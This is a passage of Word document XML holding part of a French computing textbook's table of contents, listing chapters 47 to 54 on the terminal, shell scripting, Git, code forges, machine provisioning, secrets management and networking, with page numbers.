          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>47.4 Droits et propriété</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>435</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>47.5 Disques et systèmes de fichiers</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>436</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>47.6 Journaux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>436</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>48. Le terminal au quotidien</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>441</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>48.1 Trois flux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>441</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>48.2 Composer avec les tubes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>442</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>48.3 Rechercher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>443</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>48.4 Historique, alias et raccourcis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>443</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>48.5 Travailler avec des flux volumineux</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>444</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>49. Scripts shell et automatisation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>449</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>49.1 L'en-tête d'un script fiable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>449</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>49.2 Variables et arguments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>449</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>49.3 Structures de contrôle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>451</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>49.4 Fonctions et réutilisation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>451</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>49.5 Tester un script</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>452</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>50. Git avancé : branches, rebasage et récupération</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>458</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>50.1 Le graphe avant les commandes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>458</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>50.2 Fusion ou rebasage</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>459</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>50.3 Résoudre un conflit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>460</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>50.4 Réparer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>461</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>50.5 Nettoyer avant de partager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>461</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>51. Forges, revues et collaboration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>466</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>51.1 Deux familles de forges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>466</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>51.2 Stratégies de branches</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>466</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>51.3 La demande de fusion</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>467</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>51.4 Conduire une revue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>468</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>51.5 Protéger la branche principale</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>469</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>52. Provisionner une machine et gérer ses paquets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>474</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>52.1 D'un système minimal à un serveur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>474</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>52.2 Maîtriser les paquets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>475</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>52.3 Durcir l'accès</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>476</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>52.4 Amorçage reproductible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>477</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>53. Environnements, secrets et configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>483</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>53.1 Trois natures de données</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>483</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>53.2 Les environnements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>483</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>53.3 Charger la configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>484</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>53.4 Chiffrer les secrets versionnés</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>485</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>53.5 Faire tourner un secret</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>486</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Partie II — Réseaux, protocoles et serveurs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>54. Réseaux : modèles et couches</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:tab/>
        <w:t>491</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TOCCours"/>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>54.1 Deux modèles, une même réalité</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="5B6770"/>
